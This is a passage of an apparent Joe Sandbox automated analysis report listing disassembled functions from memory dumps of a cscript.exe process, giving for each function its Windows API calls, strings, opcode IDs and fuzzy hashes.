                                                      • Instruction Fuzzy Hash: BA1191B5904119ABCB309FA5ED08EEF77BBFB94744F111019E952A3260D6709901DBB1
                                                      Function 04C66940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: bff2ce5f69f72d2f318806ce968b7d384d218ff7223909b9b82670df886c02cd
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 9F021771609341AFD305CF18C494A6FBBE6EFC8718F048A6DF9868B254DB31E945CB52
                                                      Function 0062B50C Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(0062B2EA,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,?,000000FF,000000FF,?,0062B2EA,?), ref: 0062B547
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0062B2EA,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,000000FF,000000FF,?,0062B2EA,?), ref: 006313BA
                                                      • __alloca_probe_16.LIBCMT ref: 006313C6
                                                      • GetLastError.KERNEL32(?,0062B2EA,?,?,?,?,00000000,00000000), ref: 006313DB
                                                        • Part of subcall function 0062B580: GetFileSize.KERNEL32(0062B2EA,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0062B595
                                                        • Part of subcall function 0062B580: CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0062B5B6
                                                        • Part of subcall function 0062B580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000), ref: 0062B5D0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 3211943082-0
                                                      • Opcode ID: 0c08939f797a0aac9bc70ea5d757a2048d90b59e09b7b9a9cdbd7d3763fd221b
                                                      • Instruction ID: 30326bb4f1889817cbc115732a041c25b519dda6b3ed983c50279cb9a99cdcd5
                                                      • Opcode Fuzzy Hash: 0c08939f797a0aac9bc70ea5d757a2048d90b59e09b7b9a9cdbd7d3763fd221b
                                                      • Instruction Fuzzy Hash: 5521D530201625BAE7205F6AAC49FDB7E6FDF067A5F200218B515B92D1D7B09940DAF4
                                                      Function 00628103 Relevance: 9.1, APIs: 6, Instructions: 79registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 00628134
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000000,80000000,?,00627F9E,?), ref: 00630495
                                                      • __alloca_probe_16.LIBCMT ref: 006304A2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,00627F9E,?,?,?,?,?), ref: 006304B6
                                                      • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 006304D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiOpenWide$__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 2527192001-0
                                                      • Opcode ID: 4f1fcbebf8f412db3874364d6515ab0adfec11c8b85eafbf848cd9edf4339821
                                                      • Instruction ID: 84b0aad64b3d743ff656fcaaad980ef76ac2e8963edf7dca079076d04238ae35
                                                      • Opcode Fuzzy Hash: 4f1fcbebf8f412db3874364d6515ab0adfec11c8b85eafbf848cd9edf4339821
                                                      • Instruction Fuzzy Hash: 4A11C870A01215FEFB209B766C08FBB7AEEEB44764F104519B955D62D2EA70CD04DAF0
                                                      Function 00638232 Relevance: 9.1, APIs: 6, Instructions: 62filelibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,00638764,00000000), ref: 00638251
                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 00638265
                                                      • CloseHandle.KERNEL32(00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 0063826E
                                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 0063827E
                                                      • CloseHandle.KERNEL32(00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 00638287
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 006382A4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                      • String ID:
                                                      • API String ID: 1262414356-0
                                                      • Opcode ID: 486725c5a4b63b5ada0cd88428f99ba37fafa3050034d58eed4083731ab5f559
                                                      • Instruction ID: 0500b6cda6829f0877ff67811d9f0d715019c14965d350a8a331d59a9cb66ea0
                                                      • Opcode Fuzzy Hash: 486725c5a4b63b5ada0cd88428f99ba37fafa3050034d58eed4083731ab5f559
                                                      • Instruction Fuzzy Hash: 18017CB2A117187EF32016B95C8CFBB661EDB81BA9F254128B90593290DE798E0161F0
                                                      Function 04BDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 8ea8b20c90f8ad04a871fb56670030744011d0849de77c8b79dc5c6628c62395
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 2B819070E092499FDF288E68C8917FEBBA1EF45350F1A45E9D861A7290F735B840CB54
                                                      Function 00627CB0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 00627E00
                                                        • Part of subcall function 00628156: GetFullPathNameW.KERNEL32(0062ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00628188
                                                      • SysAllocString.OLEAUT32(?), ref: 00627D2B
                                                      • SysAllocString.OLEAUT32(?), ref: 00627D45
                                                        • Part of subcall function 0062B1D0: LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00627DA1,?,?,?,?,?,?,?), ref: 0062B1E9
                                                        • Part of subcall function 0062B1D0: GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0062B1FF
                                                        • Part of subcall function 0062B1D0: GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0062B216
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00627DA4
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0062AF21
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0062AF3B
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0062AF55
                                                        • Part of subcall function 0062AE90: memset.MSVCRT ref: 0062AF7D
                                                        • Part of subcall function 0062AE90: memset.MSVCRT ref: 0062AFB9
                                                        • Part of subcall function 006262F0: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 006263D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$String$Allocmemset$CloseFreeFullHandleLibraryLoadMessageNamePathSend
                                                      • String ID: .wsf
                                                      • API String ID: 2713354114-2429851548
                                                      • Opcode ID: 67e1a81dfb4759553a4ee0530289dcff9d402c2308b2e76a46bc2b4f5c027850
                                                      • Instruction ID: 37202b40ff038a250ac22914dea66272cb3321be3890e5d227ddbcf5d1dad52d
                                                      • Opcode Fuzzy Hash: 67e1a81dfb4759553a4ee0530289dcff9d402c2308b2e76a46bc2b4f5c027850
                                                      • Instruction Fuzzy Hash: F571F935A006399BDB249F54DCA8BAE77B7AF44310F1501ADEC06A7351CA349E458FE1
                                                      Function 04C420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
                                                      • Instruction ID: 29021a9f5e6112f0050980cf6461b244928ffcc0668c35790bd6476ade5b03bd
                                                      • Opcode Fuzzy Hash: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
                                                      • Instruction Fuzzy Hash: E721567AA001199BDB10DFB9C941ABEB7F9EF94684F040195F905D3200E731EA01DBA1
                                                      Function 00632A29 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000000,WSFFile,00000000,0002001F,?,Open2,?,00000001,WSFFile,?,006329F1,00000000), ref: 00632A48
                                                      • RegCloseKey.ADVAPI32(?,?,Open2,?,006329F1,00000000), ref: 00632A8C
                                                        • Part of subcall function 00632B00: RegOpenKeyExA.ADVAPI32(?,ScriptEngine,00000000,00020019,?,00000000,?,?,00632A5F,?,006329F1,00000000), ref: 00632B18
                                                        • Part of subcall function 00632B00: RegCloseKey.ADVAPI32(?,?,00632A5F,?,006329F1,00000000), ref: 00632B27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen
                                                      • String ID: Open2$Shell$WSFFile
                                                      • API String ID: 47109696-847890310
                                                      • Opcode ID: 498ade761c151c7bba0acc84c98ffe070bc19fb296c43d720d20a100667103d3
                                                      • Instruction ID: fe42456c397176e755fa585755b44b20f4499b43d9cf461c67bc79fbaff36b25
                                                      • Opcode Fuzzy Hash: 498ade761c151c7bba0acc84c98ffe070bc19fb296c43d720d20a100667103d3
                                                      • Instruction Fuzzy Hash: 2201D432B00167BB97345AA99C65AABBBABDF90794F21413AFD06E7301D6608D0092E0
                                                      Function 0062DA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(urlmon.dll,00000000,00000800,00000000,?,?,?,0062DA13,?,?,?,00627E67,00000000,000000FF,?), ref: 0062DA50
                                                      • GetProcAddress.KERNEL32(00000000,CreateURLMonikerEx), ref: 0062DA69
                                                      • GetLastError.KERNEL32(?,0062DA13,?,?,?,00627E67,00000000,000000FF,?,?,?,?), ref: 00631C51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastLibraryLoadProc
                                                      • String ID: CreateURLMonikerEx$urlmon.dll
                                                      • API String ID: 3511525774-3151727589
                                                      • Opcode ID: ef6abfdbf69b5c32ee2ae5218303a04096f153f4cbf8353a282be6a83f282dd1
                                                      • Instruction ID: dbc758a2ae34a5e69314aa6d14d3f81ed93e0bb167cce096ce4c7df8cfd43659
                                                      • Opcode Fuzzy Hash: ef6abfdbf69b5c32ee2ae5218303a04096f153f4cbf8353a282be6a83f282dd1
                                                      • Instruction Fuzzy Hash: 580164712082226BD7105B54BC05FA637DBE7E0752F045014E904C7351DAA6CC028EF1
                                                      Function 0062A8DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800,-00000001,?,-00000004,?,?,00627147,00000000,00000001), ref: 0062A8FA
                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0062A90C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00627147,00000000,00000001), ref: 0062A939
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: HeapSetInformation$kernel32.dll
                                                      • API String ID: 145871493-3597996958
                                                      • Opcode ID: ae09475990049fb8ca392c60161d3d6e18abf36c0f5c8918c64b95ff9b296e9a
                                                      • Instruction ID: 4f7a2a10b6a1be428d0169971ef00fa652e34363b25f9a6962c82a55dcb4aeed
                                                      • Opcode Fuzzy Hash: ae09475990049fb8ca392c60161d3d6e18abf36c0f5c8918c64b95ff9b296e9a
                                                      • Instruction Fuzzy Hash: DFF02D31B1072177D32017F77C49E6B39AFD7C1B51F160034F552E1340EAA4CC419AA2
                                                      Function 00632BAE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00632AB3: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,00632BFE,Open2,00000000,WSFFile,?,00632BFE,?,?,?,?,Open2,00000000), ref: 00632ACF
                                                        • Part of subcall function 00632AB3: RegCreateKeyA.ADVAPI32(80000001,?,00632BFE), ref: 00632ADE
                                                        • Part of subcall function 00632B3F: RegOpenKeyExA.ADVAPI32(?,Shell,00000000,00020006,?,00000000,?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B53
                                                        • Part of subcall function 00632B3F: RegSetValueExA.ADVAPI32(?,00623EFE,00000000,00000001,006329F1,00000001,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B89
                                                        • Part of subcall function 00632B3F: RegCloseKey.ADVAPI32(?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B94
                                                      • RegCloseKey.ADVAPI32(?,?,Open2,?,?,?,?,Open2,00000000), ref: 00632C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen$CreateValue
                                                      • String ID: Open2$SOFTWARE\Classes\%s\%s$Shell$WSFFile
                                                      • API String ID: 314704141-1287852826
                                                      • Opcode ID: 2aed4c2c7cd6e1aa17da44f7fb479258fcef7765135b842c1e34ebdc5c54e2fc
                                                      • Instruction ID: ead4c09f01540e4e91d6b8d18e6979debf4877751043af4645f08f69a262d494
                                                      • Opcode Fuzzy Hash: 2aed4c2c7cd6e1aa17da44f7fb479258fcef7765135b842c1e34ebdc5c54e2fc
                                                      • Instruction Fuzzy Hash: BB01DB7190023567C72497649C15DDEB7BADB94710F0101A5FD44A3340DBB49E858DD0
                                                      Function 00628070 Relevance: 7.6, APIs: 5, Instructions: 97registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 006280BD
                                                      • __alloca_probe_16.LIBCMT ref: 006303EF
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00630407
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0063043D
                                                      • GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0063044B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 3112009249-0
                                                      • Opcode ID: 97aa68f37da1b919ad613c74cc47d4b8ca3441fde3b17b100ec50a4ab533ad4e
                                                      • Instruction ID: ddacb21764176ec37715235c9e8b68d68a6cb072be940bc0292d33bc9bc9428a
                                                      • Opcode Fuzzy Hash: 97aa68f37da1b919ad613c74cc47d4b8ca3441fde3b17b100ec50a4ab533ad4e
                                                      • Instruction Fuzzy Hash: CD31E831A04528BFEB209B94AC45BEE77BAEB54311F208055FA11EB291DF70DD48CB99
                                                      Function 00625F20 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00625F32
                                                      • MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 00625FA0
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00625FB2
                                                      • GetTickCount.KERNEL32 ref: 00625FD2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CountTick$MessageMultipleObjectsPeekWait
                                                      • String ID:
                                                      • API String ID: 856712567-0
                                                      • Opcode ID: e0f37009f0d230778a75bf80fdeb1e46646bebb73944baa9b2b1e4527996e0f4
                                                      • Instruction ID: 4da4e73cdc84bb2926546b40a20ef9c9d2a2f0329f4b6900c4b09ef66a0dfad3
                                                      • Opcode Fuzzy Hash: e0f37009f0d230778a75bf80fdeb1e46646bebb73944baa9b2b1e4527996e0f4
                                                      • Instruction Fuzzy Hash: 4931C171E00A19F7DB155F90EA487EE7B79FF04741F208194E542B51D0E7358A51EF81
                                                      Function 0062C130 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00639498), ref: 0062C155
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 0062C192
                                                      • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 00631651
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 00631662
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterLoadType
                                                      • String ID:
                                                      • API String ID: 2204791303-0
                                                      • Opcode ID: e13e2b77b8fbc6b0deebb22891d6e8f875590439b62f08e61aa23250227a4447
                                                      • Instruction ID: 20ce2acf0234317c3564010d57aa3daac0a59f961ecacda6092bef1e658f792c
                                                      • Opcode Fuzzy Hash: e13e2b77b8fbc6b0deebb22891d6e8f875590439b62f08e61aa23250227a4447
                                                      • Instruction Fuzzy Hash: 58216B75200609EFC7109F98EC89A6D77B7FB88310F254058E9069B391DB71AC12EFA1
                                                      Function 0062BEC0 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00639498), ref: 0062BEE5
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 0062BF22
                                                      • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 006315C0
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 006315D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterLoadType
                                                      • String ID:
                                                      • API String ID: 2204791303-0
                                                      • Opcode ID: 40e6f29fdc8edfae6ed7138e2f17befbb9c19417d31355454d24841d3128164c
                                                      • Instruction ID: 624ae1f41d2a69ed3449fc94c4d749bcb0b8a420f6c18c805893e3674e4e0e43
                                                      • Opcode Fuzzy Hash: 40e6f29fdc8edfae6ed7138e2f17befbb9c19417d31355454d24841d3128164c
                                                      • Instruction Fuzzy Hash: 34216875200709EFC7109F98EC84AAA77B6FB88310F251058E9069B351DB71AD42EFA1
                                                      Function 00628210 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • GetCurrentThreadId.KERNEL32 ref: 00628256
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0062826A
                                                      • CreateThread.KERNEL32(00000000,00000000,0062C370,00000000,00000000,00000014), ref: 0062828B
                                                        • Part of subcall function 0062865B: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 0062867A
                                                      • CloseHandle.KERNEL32(?), ref: 006282AA
                                                      • GetLastError.KERNEL32 ref: 0063068C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateThread$CloseCurrentErrorEventHandleLastMultipleObjectsWaitmalloc
                                                      • String ID:
                                                      • API String ID: 2537244164-0
                                                      • Opcode ID: f941ea390c094b7c057317be6b8c624a37abf4173bf22e3b9fc665cfcdcf4e7f
                                                      • Instruction ID: 991cfefc87161def8ce768f2fea8e42c3bb54f7e97c11fda509e7f9db4a5f5b0
                                                      • Opcode Fuzzy Hash: f941ea390c094b7c057317be6b8c624a37abf4173bf22e3b9fc665cfcdcf4e7f
                                                      • Instruction Fuzzy Hash: FA21C2B1141B219FE3305F559C197177AF3AB81711F21491CE8868B391DBB9E4098FD5
                                                      Function 04BBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C002E7
                                                      • RTL: Re-Waiting, xrefs: 04C0031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C002BD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                      • Instruction ID: d8d39e8031efdd2bb1c00b88a28773095198f527b495c84abafe1dac27357efb
                                                      • Opcode Fuzzy Hash: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                      • Instruction Fuzzy Hash: 05E1AE306047419FD725CF29C884B7AB7E1FB49314F144AADE8A5CB2E1E7B4E945CB82
                                                      Function 00627030 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: wcscpy_s
                                                      • String ID: WSH
                                                      • API String ID: 4009619764-2133009938
                                                      • Opcode ID: 27d35b79e1377a9c793ec0e80622b29b11a3bf6bf8aa26326b452a86ba83ac99
                                                      • Instruction ID: a7f4993f7d12ed2f6b0739ef7ca82e2f0c98286952d175f347ceb352bc26977d
                                                      • Opcode Fuzzy Hash: 27d35b79e1377a9c793ec0e80622b29b11a3bf6bf8aa26326b452a86ba83ac99
                                                      • Instruction Fuzzy Hash: D45138B06006299BDB24DB64EC85BFA73ABFF44314F184169E90697381DB31AD45CFE1
                                                      Function 04BCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C07B7F
                                                      • RTL: Resource at %p, xrefs: 04C07B8E
                                                      • RTL: Re-Waiting, xrefs: 04C07BAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
